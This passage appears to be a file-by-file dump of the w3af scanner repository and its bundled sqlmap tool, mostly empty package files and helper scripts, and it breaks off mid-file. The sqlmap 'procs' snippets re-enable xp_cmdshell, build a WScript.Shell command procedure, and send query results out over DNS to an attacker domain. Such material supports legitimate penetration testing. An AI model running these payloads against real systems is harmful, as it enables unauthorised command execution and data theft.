-------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/yes.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/two_scans/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/two_scans/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/two_scans/images/audit_gray_background.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/two_scans/images/audit_gray_background.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/two_scans/images/previous_target.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/two_scans/images/previous_target.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/two_scans/images/start.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/two_scans/images/start.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/wrappers/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/wrappers/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/wrappers/gnome.xinitrc: -------------------------------------------------------------------------------- 1 | gsettings set org.gnome.desktop.interface toolkit-accessibility true 2 | . /etc/X11/xinit/xinitrc 3 | gnome-settings-daemon & 4 | gnome-panel & 5 | nautilus -n & 6 | metacity & 7 | sleep 10 8 | -------------------------------------------------------------------------------- /w3af/core/ui/tests/wrappers/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/wrappers/tests/__init__.py -------------------------------------------------------------------------------- /w3af/locales/es/LC_MESSAGES/w3af.mo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/locales/es/LC_MESSAGES/w3af.mo -------------------------------------------------------------------------------- /w3af/locales/ru/LC_MESSAGES/w3af.mo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/locales/ru/LC_MESSAGES/w3af.mo -------------------------------------------------------------------------------- /w3af/plugins/__init__.py: -------------------------------------------------------------------------------- 1 | # Translation hack. Needed for tests completion. 2 | try: 3 | _('blah') 4 | except: 5 | import __builtin__ 6 | __builtin__.__dict__['_'] = lambda x: x 7 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/.gitattributes: -------------------------------------------------------------------------------- 1 | *.conf text eol=lf 2 | *.md text eol=lf 3 | *.md5 text eol=lf 4 | *.py text eol=lf 5 | *.xml text eol=lf 6 | 7 | *_ binary 8 | *.dll binary 9 | *.pdf binary 10 | *.so binary 11 | *.wav binary 12 | *.zip binary 13 | *.x32 binary 14 | *.x64 binary 15 | *.exe binary 16 | *.sln binary 17 | *.vcproj binary 18 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/.gitignore: -------------------------------------------------------------------------------- 1 | *.py[cod] 2 | output/ 3 | .sqlmap_history 4 | traffic.txt 5 | *~ 6 | .idea/ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/.travis.yml: -------------------------------------------------------------------------------- 1 | language: python 2 | python: 3 | - "2.6" 4 | - "2.7" 5 | script: 6 | - python -c "import sqlmap; import sqlmapapi" 7 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/doc/AUTHORS: -------------------------------------------------------------------------------- 1 | Bernardo Damele Assumpcao Guimaraes (@inquisb) 2 | 3 | 4 | Miroslav Stampar (@stamparm) 5 | 6 | 7 | You can contact both developers by writing to dev@sqlmap.org 8 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/doc/FAQ.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/doc/FAQ.pdf -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/doc/README.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/doc/README.pdf -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/beep/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/beep/beep.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/extra/beep/beep.wav -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/cloak/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/dbgtool/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/icmpsh/icmpsh.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/extra/icmpsh/icmpsh.exe_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/runcmd/README.txt: -------------------------------------------------------------------------------- 1 | runcmd.exe is an auxiliary program that can be used for running command prompt 2 | commands skipping standard "cmd /c" way. It is licensed under the terms of the 3 | GNU Lesser General Public License. 4 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/runcmd/runcmd.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/extra/runcmd/runcmd.exe_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/runcmd/src/README.txt: -------------------------------------------------------------------------------- 1 | Compile only the Release version because the Runtime library option 2 | (Project Properties -> Configuration Properties -> C/C++ -> Code 3 | Generation) is set to "Multi-threaded (/MT)", which statically links 4 | everything into executable and doesn't compile Debug version at all. 5 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/runcmd/src/runcmd/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // runcmd.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/safe2bin/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/shellcodeexec/README.txt: -------------------------------------------------------------------------------- 1 | Binary files in this folder are data files used by sqlmap on the target 2 | system, but not executed on the system running sqlmap. They are licensed 3 | under the terms of the GNU Lesser General Public License and their source 4 | code is available on https://github.com/inquisb/shellcodeexec. 5 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/shellcodeexec/linux/shellcodeexec.x32_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/extra/shellcodeexec/linux/shellcodeexec.x32_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/shellcodeexec/linux/shellcodeexec.x64_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/extra/shellcodeexec/linux/shellcodeexec.x64_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/shellcodeexec/windows/shellcodeexec.x32.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/shutils/blanks.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'LICENSE' for copying permission 5 | 6 | # Removes trailing spaces from blank lines inside project files 7 | find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \; 8 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/shutils/pep8.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'LICENSE' for copying permission 5 | 6 | # Runs pep8 on all python files (prerequisite: apt-get install pep8) 7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \; 8 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/shutils/pydiatra.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'LICENSE' for copying permission 5 | 6 | # Runs py2diatra on all python files (prerequisite: pip install pydiatra) 7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py2diatra '{}' \; | grep -v bare-except 8 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/shutils/pyflakes.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'LICENSE' for copying permission 5 | 6 | # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes) 7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \; 8 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/extra/sqlharvest/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/lib/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/lib/controller/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/lib/core/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/lib/parse/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/lib/request/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/lib/takeover/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/lib/techniques/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/lib/techniques/blind/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/lib/techniques/dns/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/lib/techniques/error/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/lib/techniques/union/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/lib/utils/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/plugins/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/plugins/dbms/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/plugins/dbms/db2/filesystem.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem 9 | 10 | class Filesystem(GenericFilesystem): 11 | def __init__(self): 12 | GenericFilesystem.__init__(self) 13 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/plugins/dbms/db2/takeover.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | from plugins.generic.takeover import Takeover as GenericTakeover 9 | 10 | class Takeover(GenericTakeover): 11 | def __init__(self): 12 | self.__basedir = None 13 | self.__datadir = None 14 | 15 | GenericTakeover.__init__(self) 16 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/plugins/dbms/informix/filesystem.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem 9 | 10 | class Filesystem(GenericFilesystem): 11 | def __init__(self): 12 | GenericFilesystem.__init__(self) 13 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/plugins/dbms/informix/takeover.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | from plugins.generic.takeover import Takeover as GenericTakeover 9 | 10 | class Takeover(GenericTakeover): 11 | def __init__(self): 12 | self.__basedir = None 13 | self.__datadir = None 14 | 15 | GenericTakeover.__init__(self) 16 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/plugins/dbms/mysql/enumeration.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | from plugins.generic.enumeration import Enumeration as GenericEnumeration 9 | 10 | class Enumeration(GenericEnumeration): 11 | def __init__(self): 12 | GenericEnumeration.__init__(self) 13 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/plugins/generic/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/procs/README.txt: -------------------------------------------------------------------------------- 1 | Files in this folder represent SQL snippets used by sqlmap on the target 2 | system. 3 | They are licensed under the terms of the GNU Lesser General Public License 4 | where not specified otherwise. 5 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/procs/mssqlserver/activate_sp_oacreate.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options',1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'ole automation procedures',1; 4 | RECONFIGURE WITH OVERRIDE 5 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/procs/mssqlserver/configure_openrowset.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options', 1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%; 4 | RECONFIGURE WITH OVERRIDE; 5 | EXEC sp_configure 'show advanced options', 0; 6 | RECONFIGURE WITH OVERRIDE 7 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/procs/mssqlserver/configure_xp_cmdshell.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options',1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; 4 | RECONFIGURE WITH OVERRIDE; 5 | EXEC master..sp_configure 'show advanced options',0; 6 | RECONFIGURE WITH OVERRIDE 7 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/procs/mssqlserver/create_new_xp_cmdshell.sql: -------------------------------------------------------------------------------- 1 | DECLARE @%RANDSTR% nvarchar(999); 2 | set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID'; 3 | EXEC master..sp_executesql @%RANDSTR% 4 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/procs/mssqlserver/disable_xp_cmdshell_2000.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_dropextendedproc 'xp_cmdshell' 2 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/procs/mssqlserver/dns_request.sql: -------------------------------------------------------------------------------- 1 | DECLARE @host varchar(1024); 2 | SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%'; 3 | EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"') 4 | # or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"') 5 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/procs/mssqlserver/enable_xp_cmdshell_2000.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll' 2 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/procs/mssqlserver/run_statement_as_user.sql: -------------------------------------------------------------------------------- 1 | SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%') 2 | # SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%') 3 | # SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%') 4 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/procs/mysql/dns_request.sql: -------------------------------------------------------------------------------- 1 | SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%')) 2 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/procs/mysql/write_file_limit.sql: -------------------------------------------------------------------------------- 1 | LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- 2 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/procs/oracle/dns_request.sql: -------------------------------------------------------------------------------- 1 | SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL 2 | # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL 3 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/shell/backdoors/backdoor.asp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/shell/backdoors/backdoor.asp_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/shell/backdoors/backdoor.aspx_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/shell/backdoors/backdoor.aspx_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/shell/backdoors/backdoor.jsp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/shell/backdoors/backdoor.jsp_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/shell/backdoors/backdoor.php_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/shell/backdoors/backdoor.php_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/shell/stagers/stager.asp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/shell/stagers/stager.asp_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/shell/stagers/stager.aspx_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/shell/stagers/stager.aspx_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/shell/stagers/stager.jsp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/shell/stagers/stager.jsp_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/shell/stagers/stager.php_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/shell/stagers/stager.php_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/tamper/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/thirdparty/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/thirdparty/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/thirdparty/ansistrm/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/thirdparty/ansistrm/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/thirdparty/bottle/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/thirdparty/colorama/__init__.py: -------------------------------------------------------------------------------- 1 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 2 | from .initialise import init, deinit, reinit, colorama_text 3 | from .ansi import Fore, Back, Style, Cursor 4 | from .ansitowin32 import AnsiToWin32 5 | 6 | __version__ = '0.3.7' 7 | 8 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/thirdparty/magic/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/thirdparty/magic/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/thirdparty/multipart/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/thirdparty/multipart/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/thirdparty/oset/__init__.py: -------------------------------------------------------------------------------- 1 | """Main Ordered Set module """ 2 | 3 | from pyoset import oset 4 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/thirdparty/socks/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/thirdparty/socks/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/thirdparty/termcolor/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/thirdparty/termcolor/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/thirdparty/wininetpton/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # Copyright Ryan Vennell 4 | # 5 | # This 